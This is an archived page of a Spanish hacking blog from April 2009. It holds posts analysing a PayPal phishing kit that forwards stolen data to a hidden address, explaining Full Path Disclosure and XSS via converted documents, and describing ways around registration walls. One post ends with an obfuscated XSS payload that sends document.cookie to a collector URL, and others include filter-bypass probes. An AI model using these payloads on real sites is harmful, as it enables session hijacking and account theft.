viernes, 24 de abril de 2009

Metes la mano en la lata y tenes la de otro en el bolsillo...

Ayer (del dia en que empece a escribir el post, ya pasó mas tiempo)alguien que vamos a llamar "Señor G", me paso un... llamemoslo "script curiosamente parecido al login de paypal" para que lo mire (esto si es en serio, nunca pense en usarlo) y revise por que no andaba.
La línea que no andaba usa una función que no conosco, pero ese no es el tema del post. Lo que pasa es que mirando el código vi algo raro, fijense ustedes:



Para que todo esté mas claro, voy a modificar el código para que muestre el valor de las variables:




seth@Tux:~/Desktop$ php scam.php
El valor de $ar es
Array
(
[dont] => suck
[remove] => ea
[its] => ndo
[good] => @
[for] => gm
[your] => ail.
[scam] => com
)

Valor de $to: "suckeando@gmail.com"
Warning: file_get_contents(index.htm): failed to open stream: No such file or directory in /home/seth/Desktop/scam.php on line 13

El valor de $arr es
Array
(
[0] => usuario@dominio.tld
[1] =>
)

Opa! email nuevo
Destinatario: "usuario@dominio.tld"
Asunto: "PaYPaL USA Bank ReZuLtAdOs DeL Spam"
Mensaje: "todos los datos robados"
Cabeceras:
"From: PeiPei
MIME-Version: 1.0
"

Opa! email nuevo
Destinatario: "suckeando@gmail.com"
Asunto: "PaYPaL USA Bank ReZuLtAdOs DeL Spam"
Mensaje: "todos los datos robados"
Cabeceras:
"From: PeiPei
MIME-Version: 1.0
"

Opa! email nuevo
Destinatario: ""
Asunto: "PaYPaL USA Bank ReZuLtAdOs DeL Spam"
Mensaje: "todos los datos robados"
Cabeceras:
"From: PeiPei
MIME-Version: 1.0
"

Opa! email nuevo
Destinatario: "suckeando@gmail.com"
Asunto: "PaYPaL USA Bank ReZuLtAdOs DeL Spam"
Mensaje: "todos los datos robados"
Cabeceras:
"From: PeiPei
MIME-Version: 1.0
"

Enviando cabecera:"Location: Thanks.htm"




A ver si se entiende, todo lo que se hace con $ar es lo mismo que
$to="suckeando@gmail.com"

Despues se crea el array $arr con tu email y $IP (antes se pone el ip del que se le roban los datos, asi que no se que es)

Mas tarde se entra en un bucle que recorre ese array y manda el email a $IP (???), $send (vos) y $to (dos veces).

Al final se redirije al usuario a Thanks.htm para que no sospeche
5 0verl0ad Labs: abril 2009 Ayer (del dia en que empece a escribir el post, ya pasó mas tiempo)alguien que vamos a llamar "Señor G", me paso un... llamemoslo ...

martes, 21 de abril de 2009

Flisol 09


Pueden buscar una reunión cerca de donde viven aca. Si tienen varias cerca, mirenlas todas porque capaz hacen unos kilómetros mas y consiguen mejores charlas, que te presten monitores, etc.

¿Quién lo organiza?

La Comunidad de Software Libre en Latinoamérica, conformada por personas y grupos de diversa índole, con el apoyo de otras entidades, principalmente educativas, y algunos patrocinadores de los eventos en cada localidad.


¿A quién está dirigido?

El evento está dirigido a todo tipo de público: estudiantes, académicos, empresarios, trabajadores, funcionarios públcios, entusiastas y aun personas que no poseen mucho conocimiento informático.


¿Cuánto cuesta?

La asistencia al evento es totalmente libre y gratuita.


¿Qué beneficios obtengo?

Tendrás la oportunidad de instalar software libre en tu computadora, apreciar qué es una real y segura alternativa a otros modelos de desarrollo y distribución de software.

Informarte sobre la filosofía, cultura y organización alrededor del mismo.
Conocer las experiencias, desarrollos e investigaciones de grupos y entidades en torno al Software Libre, tanto a nivel local como nacional e internacional.

Tal vez encuentres una alternativa/solución en software libre para ti, tu empresa, colegio, universidad e, incluso, para tu gobierno.

Podrás aclarar tus dudas acerca de los temas relacionados y, quizás encuentres en el software libre, una alternativa de investigación, empleo y desarrollo tecnológico.
5 0verl0ad Labs: abril 2009 Pueden buscar una reunión cerca de donde viven aca . Si tienen varias cerca, mirenlas todas porque capaz hacen unos kilómetros mas y consig...

martes, 14 de abril de 2009

Full Path Disclosure [FPD]

Saludos a todos,


Hace ya tiempo que no hago mención a alguna vulnerabilidad de esas que consideramos de Regional Preferente... me refiero a esas que medio mundo desprecia, y el otro medio cuando algún colgado (como el servidor aquí presente) explica dicen aquello de... AHH ¿Pero esto es una vulnerabilidad?. Y como no podría ser de otra forma, el Full Path Disclosure, es una entra en esta categoría... ¡tan innecesarias y útiles a la vez!


De su propio nombre podemos imaginarnos con una probabilidad de éxito cerca al 0'87 (eliminamos a aquellos que ni jota de inglés x'D) qué es lo que hace esta vulnerabilidad. Si eres de esa pequeña franja que no se lo imagin... Se trata de poder ver las rutas reales del servidor. Si ves una web cualquiera, al estilo de www.ejemplo.mil/Prueba/Concepto/Index.php, y pecasemos de ingenuidad, podrías llegar a pensar que Index.php se encuentra en /home/Prueba/Concepto/Index.php, pero te aseguro que así no es. Lo más normal es que fuera /home/Victor/html_docs/Prueba/Concepto/Index.php, /home/Victor/html_public/web/Prueba/Concepto/Index.php, etc...


Entonces el FPD consiste en que tras introducir valores malformados podamos obtener errores de los cuales extraer la ruta. Esto te va sonando más, ¿Verdad? Son los clásicos errores de:

Warning: main(/include/lang/es.php): failed to open stream: No such file or directory in /home/PoC/include/global.php on line 18

Warning: main(): Failed opening '/include/lang/es.php' for inclusion (include_path='.:/home/PoC/include') in /home/miarroba/include/global.php on line 18 t


En ese error encontramos el más clásico entre los clásicos errores que nos aparecen al tratar de explotar un LFI. Y es en este momento donde te das cuenta de para qué sirve estos errores... Como acabo de decir, en los LFIs es muy interesante para poder localizar el lugar donde se encuentran los ficheros que incluye (P.E.: $path = "/Includes/Juaker/".$_GET['file']; include($path);, ya sabes qeu si tu shell está en /Includes/Upload/, vas a necesitar aplicar un ../ para saltar a /Includes/). Otro ejemplo común puede ser para emplear sentencias de volcado de contenido de ficheros a través de SQLi, donde por ejemplo para emplear load_file() necesitaremos conocer el path exacto de donde se encuentra el fichero que le pasamos como parámetro.


Pero hasta ahora hemos estado hablando de forma muy abstracta, mucho bla bla y poco movimiento, así que procedo algunas formas de provocar un FPD. Por supuesto que la más clásica y mítica es introducir un fichero inexistente como parámetro a una función del script que trabaje con ficheros... como no encuentra el archivo, nos arrojará un error al estilo del que ya he mostrado.


En general esto de meter parámetros malformados o erróneos suele funcionar en bastantes ámbitos, por ejemplo, si hacemos un clásico SQLi a un sistema que corre Windows, lo más probable es que nos encontremos con un mensajito de error volcado por OLE DB en el cual encontraremos la ruta del script que obtuvo el error. Otro escenario, quizás menos habitual pero igualmente interesante, es la de provocar Null Sessions (o introducir caracteres extraños en una cookie) para que session_start() de un error (idea sacada de OWASP).

La última forma que se me ocurre ahora mismo es una que leí de Xianur0 en su paper sobre vulnerabilidades en SMF, y es la de usar un array vacío. Por ejemplo: /index.php=seth[]=SUCKS


Creo que las vulnerabilidades de Sensitive Information al estilo de esta están muy infravaloradas, ya que casi siempre (quizás soy el único ser humano al que le ocurre esto) son un recurso interesante y útil a la hora de una auditoría de seguridad en WebApps.

Y cómo solucionarlo... facil, en las directivas poner error_reporting(0) :D

Byt3z

PD: Si conoceis más métodos de provocar FPDs, posteadlos.

PD: onmouseover="h=String.fromCharCode(104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,47,99,111,46,112,104,112,63,99,107,61);document.location(h.concat(document.cookie);"
PD2: onclick="alert(String.fromCharCode(112,114,117,101,98,97,115,53));"
PD3:"onmouseover="alert(String.fromCharCode(112,114,117,101,98,97,115,54));"
5 0verl0ad Labs: abril 2009 Saludos a todos, Hace ya tiempo que no hago mención a alguna vulnerabilidad de esas que consideramos de Regional Preferente... me refiero ...

lunes, 13 de abril de 2009

Metadatos III: OpenOffice

Saludos a todos,


Hoy vamos a hablar de los metadatos en los archivos ofimáticos creados con OpenOffice (que abreviaremos con OO a partir de este momento), ya que está bastante referenciada y es relativamente fácil de entender.

OpenOffice trabaja con ODF, un formato de archivos orientado al almacenamiento de aplicaciones ofimáticas que está basado en un esquema XML. Si se trata de "almacenamiento", podemos deducir que contiene ficheros dentro. Para poder ver que tiene simplemente click derecho->Extraer aquí; y como resultado tendremos carpetas y archivos, de entrada podemos ver:

------[directorios]---

META-INF/
Thumbnails/
Pictures/
Configurations2/

------[Archivos]---

content.xml
meta.xml
settings.xml
styles.xml
mimetype
layout-cache

Dentro de cada directorio encontraremos más ficheros, pero que a nosotros nos interse realmente, sólo es meta.xml, aunque como metadata "real" manifest.xml también merece ser mencionado.


Dentro de META-INF como podemos pensar a simple vista encontraremos metadatos, pero no de esos jugosos que a nosotros nos interesa, si no que nos encontramos un archivo .xml llamado "manifest.xml", si lo abrimos:



Podremos ver un listado de las carpetas y archivos que se encuentran dentro del documento ODF. Nada intersante, si lo comparamos con con lo que podemos encontrar en meta.xml. Ahí encontramos todo lo que buscamos, authores, editores, fechas, programa con que se generó, fechas, editajes, etc...



Si se desea aprender más sobre ODF y los metadatos, existe bastante información en la página oficial, aquí dejo sólo un link, pero os aseguro qeu es fácil encontrar toda la información de forma detallada:

ODF 1.2 Metadata specification

Byt3z
5 0verl0ad Labs: abril 2009 Saludos a todos, Hoy vamos a hablar de los metadatos en los archivos ofimáticos creados con OpenOffice (que abreviaremos con OO a parti...

sábado, 11 de abril de 2009

Saltarse el "tenes que estar registrado para..."

Hay páginas que ofrecen recursos (imágenes, libros en pdf, etc) gratis, pero para descargarlos piden que te registres. Por ejemplo planetrenders quiero bajarme este render. Pueden ver la imágen chica pero para bajarla en tamaño completo te piden que te registres.
La url de la vista previa es esta: http://planetrenders.net/renders/albums/userpics/24332/normal_papillon%20copie.png

Simplemente le borramos el "normal_" y la tenemos del tamaño original: http://planetrenders.net/renders/albums/userpics/24332/papillon%20copie.png

Funciona en todos.

En otra webs, al querer bajar algo nos lleva a una web asi: http://example.com/register.php?url=http://example.com/downloads/nombre-de-un-archivo.rar

Esto es para que nos registremos y despues nos redirija a http://example.com/downloads/nombre-de-un-archivo.rar
En muchos casos, al abrir esa url ya descargamos el archivo. También puede ser que se pase por post, hay que mirar las cabeceras http.
5 0verl0ad Labs: abril 2009 Hay páginas que ofrecen recursos (imágenes, libros en pdf, etc) gratis, pero para descargarlos piden que te registres. Por ejemplo planetren...

miércoles, 8 de abril de 2009

Browser Rider: what you never expected your browser could do to you

Bueno la verdad es que no tengo demasiado tiempo para contruir un buen artículo (15 minutos XD) ya que al igual que The X-C3LL también parto de vacaciones a mi pueblo, así que en nuestra ausencia me temo que le tocara a seth mantener el blog :P

-------------------------------------------------------------------------------------------------

Y otra de OWASP se podría decir. Ayer por la noche después de haber estado jugando un poco con igoogle, estaba mirando las conferencias que ya habían terminado haber si podía agarrar algún paper/video de algún sitio. En eso que vi que la Australia conference ya había finalizado hace tiempo. Y buscando llegué a las presentaciones , vi una que me llamó especialmente la atención.

Browser Rider: what you never expected your browser could do to you

Browser exploitation is in fashion but it doesn't seem that there's a popular tool to build and run attacks. Browser Rider will try to fill the gap by providing a framework to build, deploy and manage payloads that exploit the browser. This project aims on the long term to provide a powerful, simple and flexible interface to any client side attack for hackers.

Proposal

Browser security has become one of the most discussed subjects. This is mainly due to two things: First, nowadays malwares are not spread over emails any longer but through web application often using JavaScript obfuscation to avoid anti-virus detection. Second as the web is growing new technologies are constantly appearing to enhance the user experience but also offering many new attack vectors. In both cases it is important to understand that the browser offers an easy mechanism for bypassing firewalls and other perimeter security to gain unauthorised access or commit other security breach.

From a security consultant point of view it can be hard to justify the risk of vulnerabilities that affect the browser such as cross-site scripting, cross-site request forgery and unauthorized redirection vulnerabilities as they do not impact directly the server or the database.

Browser rider is a security tool to exploit browser vulnerabilities. It offers several existing payloads but also provides a complete programming framework to develop exploits. It also acts as a management system to deploy your attacks and control the infected browsers.

The first part of this presentation will introduce the audience to the tool and demonstrate many attacks that can be ported to the browser using the Browser Rider. The second part will technically explain how the tool works (i.e. obfuscation, signature detection avoidance, polymorphism, program architecture, framework), how to write your own exploits with it and deploy them.

On the long term Browser Rider aims at becoming a complete solution to execute, develop and test browser based attacks for security consultants.



Google un poco y encontré la página oficial de esté proyecto, junto a una presentación ppt.

Browser Rider - A hacking framework for browser explotation

Browser Rider OWASP 2009 Melbourne Chapter

Básicamente es un framework basado en payloads una interfaz simple y manejable para cualquier tipo de cliente que se pueda explotar.

Les recomiendo que prueben la demo online y que consulten la documentación de la wiki.

Engineering For Fun Wiki

Saludos a todos y felices pascuas!



5 0verl0ad Labs: abril 2009 Bueno la verdad es que no tengo demasiado tiempo para contruir un buen artículo (15 minutos XD) ya que al igual que The X-C3LL también parto...

El día de los e-mails

Saludos a todos,

Creo que los miércoles van a ser un buen día para hablar un poco de los comentarios, dudas y sugerencias (tanto negativas como positivas, aquí no censuramos nada) en referente al blog que me llegan a mi buzón.

La verdad es que en líneas generales los comentarios han sido positivos de "hey, me gusta tu blog" y similares y el que más se repite "gracias por cambiar de theme, el anterior me producía úlcera", a falta de dos excepciones donde nos ponen a parir. Bueeeno, todo lo que publicamos aquí, o la forma en que lo hacemos, quizá no sea la mejor, aceptamos críticas constructivas... pero algo sí que quiero decir a estas personas...


En primer lugar a "br3t/\N", el cual en su e-mail nos califica de ir de "Técnicoless". Sinceramente en ningún momento la intencionalidad de este blog es la de asumir los roles de otros personajillos de la red, véase Enrique Dans, y demás personas que viven de la farándula. No queremos ni tener tropecientas visitas, ni ser "famosetes". Nuestra única intención a través de de este blog es la de transmitir un poco de conocimiento a aquellas personas que se inician en este mundillo o que símplemente desean aprender algo nuevo.

Si a través de este blog conseguimos que, aunque sólo un 1% de los lectores, aprendan algo nuevo que les vaya a ser útil, nos damos por satisfechos. Nos consideramos símplemente otro medio de difusión.


Y al otro e-mail enviado por "Anônim@", que desconozco si ese es su nick o símplemente quería pasar como "anónimo", enviado por RecoverPassHotmail002-at-hotmail-dot-com (esto ya da mucho que pensar la verdad...) símplemente decirle que cuando trate de insultar, por favor no agreda tan salvájemente a la Real Academial Española... un pequeño extracto del mail (una pena que lo haya borrado "sin querer"):

"(...)Sk sois unns atentics lammmmmeeeeeeeeeeerssssssssssssss pk no tneis ni ide sorbe hackear cuenta msn!!!!!!!!! Io si soi un hacker y le robe la cuenta a ds d mi classsse(...)

(...)buestrs madrs son uns hijas d pupta, y vstros papas tb!!!(...)"


Clap, Clap, magnífico uso de aquesta nuestra lengua... la verdad es que tras leer esto creo que sufrí un terrible y peligroso ataque por este "juacker": un RKD (Remote Kick Dictionary).


Y por último la primera duda que nos hay llegado, aunque no esté relacionada con las vulnes voy a dejar un link que responde muy bien a la duda de "NW-Perl":

"¿Podrías por favor dejarme algún link donde se hable del manejo de los metadatos en archivos de música en perl? En concreto me interesaría información sobre el formato MP3"

Link

En ese link explican bastante bien este tema, espero que te sea de utilidad.

Lo dicho, sigan mandando sus e-mails, que los miércoles pasaremos a leerlos (y por favor, que sean legibles, no vayan a provocarnos una denegación de servicios por un RKD)

Byt3z!
5 0verl0ad Labs: abril 2009 Saludos a todos, Creo que los miércoles van a ser un buen día para hablar un poco de los comentarios, dudas y sugerencias (tanto negativ...

lunes, 6 de abril de 2009

httprecon, identificando servidores web

httprecon es un programa para Windows que permite analizar e identificar que servidor http esta corriendo un objetivo. Analiza los banners, códigos de error devueltos, el orden de las cabeceras, etc.


Esta programado en VisualBasic 6 y es de código abierto, además de que se pueden ver los datos que utiliza.

Web
Descarga
FAQ
5 0verl0ad Labs: abril 2009 httprecon es un programa para Windows que permite analizar e identificar que servidor http esta corr...

domingo, 5 de abril de 2009

XSS (Cross Site Scripting) Prevention Cheat Sheet

Buenas! Para los que no me conozcan soy Lix y desde ahora también escribiré en el blog de mi amigo The X-C3LL. Probablemente a algunos les suene mi nombre de los 1000² alagos que me echa Vengador por mis "maravillosos" links que le paso despues de repasar mi burrada de RSS's.

Espero que todos mis posts les sean de utilidad y que disfruten de ellos.

-----------------------------------------------------------------------------------------------------------------

Hace algun tiempo cuando The X-C3LL retomó el blog después de su tiempo de inactividad posteo una XSS cheat-sheet , en este post compartió algunos de los metodos mediante los cuales el intentaba bypassear los filtros impuestos en algunos casos que nos dificultan la tarea.

Revisando la pagina de OWASP (la cual visito diariamente) me encontré con este documento:

XSS (Cross Site Scripting) Prevention Cheat Sheet

Cuando nos encontramos con el problema de querer protegernos contra algunos ataques que pueden sufrir nuestras webs normalmente la solución a estos suele ser más tediosa que la simplicidad de los ataques. Al igual que los ataques que pueden ir desde un simple alert(5), hasta ataques más elaborados que intenten bypassear algún tipo de filtro: onmouseover="alert(String.fromCharCode(70,117,99,107,32,105,71,111,111,103,108,101));" . De esta misma forma cuando queremos defendernos de estos ataques disponemos desde soluciones simples y rápidas como sanear nuestra variable simplemente con una función en PHP como htmlspecialchars hasta sistemas más complejos como filtros propios en JavaScript, alguna libreria de filtrado como HTMLPurifier o algun Web IDS.

La idea de este post es la misma que la del anterior post de cheatsheet, recolectar varias maneras de prevenirnos de este tipo de ataque, compararlas y seleccionar cual es la más efectiva y segura.

Saludos y espero que participen...
5 0verl0ad Labs: abril 2009 Buenas! Para los que no me conozcan soy Lix y desde ahora también escribiré en el blog de mi amigo The X-C3LL. Probablemente a algunos les s...

sábado, 4 de abril de 2009

Hacking RSS and Atom (607 páginas)

Hacking RSS and Atom



Mi última adquisición, mi lectura para descansar de las tardes de estudio que me esperan XDD.


DESCARGA

Que quede claro que símplemente he recolectado el link de internet, YO NO HE SUBIDO ESTE ARCHIVO (aclaro, que despues los del Copyright se nos ponen farrucos XD)
5 0verl0ad Labs: abril 2009 Hacking RSS and Atom Mi última adquisición, mi lectura para descansar de las tardes de estudio que me esperan XDD. DESCARGA Que qued...

viernes, 3 de abril de 2009

XSS a través de OpenOffice

Saludos a todos!

Como es habitual, antes de empezar con la parte técnica, os voy a contar un poco de mi vida... Bien, esta noche voy a volver a las desérticas tierras de Almería para poder disfrutar de estas vacaciones... en esta semana que viene, continuaré con la parte de Metadatos que se borró (archivos .XLS), ya que en este ordenador no poseo MS Office para poder poner imágenes molonas y todos esos rollos, por lo que a esperar os toca :P (la culpa la tiene Lix por decirme que me ponga Fedora 10 XD). Por otra parte, algo interesante es que probablemente se nos una un compañero más en este patiburrillo que tengo por blog... así que ya podríamos decir que vamos a ser algo parecido a un blog serio.

Y hasta aquí el avance de noticias, ahora viene la parte técnica

==========================

Leyendo por el blog del Doctor Maligno me fijé en esto de colgar los PowerPoints de las presentaciones en una web para no tener que descargarlo y poder visualizarlo. Me pareció una cosa bastante curiosa la verdad, y como todo buen curioso me dispuse a leer un poco de cómo funcionaba este sistema.

La verdad es que ví varias variantes utilizando scripts en PHP, entre los cuales destacaban la conversión de los archivos en .pdf y en .html. Y es al leer sobre este último tipo de conversión donde se me planteó una pequeña idea que me atrajo bastante la verdad... y consiste en introducir código malicioso en el documento para que el .html generado tuviera un link que apuntase a una sentencia JavaScript...

Entonces me puse mano a la obra, abrí OpenOffice inserté un link con una pequeña sentencia javascript a modo de prueba de concepto:



Despues lo guardé primero como .doc y despues lo pasé a .html. Resultado: al cliclar sobre el link se me ejecutaba el alert. Bien... esto en la teoría debería de funcionar de 10... El caso es que quise probar "in situ" si mi teoría se cumpliría... y me fui hacia scribd.com, web bastante conocida y usada para subir cosas. Así que me encaminé a subir mi prueba de concepto haber que pasaba, aquí teneis el resultado: Prueba de Concepto , si dejais el ratón sobre link, observareis que no indica hacia donde apunta, por lo que no se puede predecir la hacia donde donde apunta el link a simple vista. Si clickais, podreis comprobar en vuestras propias carnes cómo se ejecuta un alert que contiene vuestra galletita :D.


Si bien, en el caso la aplicación está en Flash... el resultado era el esperado. Podemos decir que la vulnerabilidad de esta aplicación web reside en dos puntos importantes: falta de filtro, y ocultación de información.

En el primer caso, de existir algún tipo de filtrado para evitar la ejecución de código javascript, podríamos evitar perfectamente que un usuario al querer seguir el link caiga en nuestras redes. Por otra parte, el hecho de que no se muestre el target del link, hace que también podamos usarlo con otros menesteres, como por ejemplo algún tipo de phising.

En fin... que revisando información de esta clase de vulnerabilidad, llegué hasta un paper de Aditya K Sood (de SecNiche.org) donde ya hablaba de la utilización de aplicaciones word como vector de ejecución de código javascript y también sobre la inclusión de frames para realizar CSRF. Aquís os dejo el paper:

http://www.secniche.org/papers/SNS_09_01_Evad_Xss_Filter_Msword.pdf




5 0verl0ad Labs: abril 2009 Saludos a todos! Como es habitual, antes de empezar con la parte técnica, os voy a contar un poco de mi vida... Bien, esta noche voy a volv...

miércoles, 1 de abril de 2009

Nueva incorporación al blog

Saludos queridos lectores,

Informamos de que un nuevo miembro se nos ha unido a este proyecto/gilipollez de blog que teníamos Mace y yo. En esta ocasión le ha tocado a Seth, uno de esos tipos con los que he es agradable de vez en cuando hablar sobre vulnes, y que siempre te abre conversación con un interesante link... Por supuesto no tanto como los de Lix, XD.


De todas formas, para aquellos que siguen el blog simplemente deciros que por culpa de unos ataques que ha sufrido en su blog, va a empezar a publicar por estos lares... así qeu ser buenos con él y leed lo que ponga... Y si no os gusta te largas por donde has venido, o como rezaba en XD Blog "Podés irte a defecar".


Sin más que decir me despido, próximas publicaciones desde las desérticas tierras almerienses... ¡¡Que DioX nos coja confesados!!
5 0verl0ad Labs: abril 2009 Saludos queridos lectores, Informamos de que un nuevo miembro se nos ha unido a este proyecto/gilipollez de blog que teníamos Mace y yo...
< >